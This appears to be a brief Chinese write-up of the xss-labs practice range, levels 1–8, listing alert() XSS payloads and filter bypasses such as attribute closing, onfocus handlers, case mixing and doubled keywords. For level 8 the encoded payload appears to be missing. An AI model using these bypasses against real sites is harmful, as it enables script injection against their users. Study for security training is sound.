xss-labs靶场1-8
level1
<script>alert()</script>
level2
闭合绕过
"> <script>alert()</script> <" 
level3+level4
onfocus事件绕过
' onfocus=javascript:alert() '然后再点击输入框触发onfocus事件 
level5
有小写字母转化函数,用a href标签法,前提是闭合号<"">没失效
"> <a href=javascript:alert()>xxx</a> <"
level6
关键字测试
大小写测试
用大小写法绕过str_replace()函数
"> <sCript>alert()</sCript> <"
level7
关键字测试
用双拼写绕过
"> <a hrehreff=javasscriptcript:alert()>x</a> <"
level8
关键字测试
input标签添加了html实体转化函数还把双引号也给实体化了, 添加了小写转化函数,过滤掉了src、data、onfocus、href、script、双引号
利用href的隐藏属性自动Unicode解码,插入一段js伪协议
javascript:alert()在线Unicode编码解码
javascript:alert()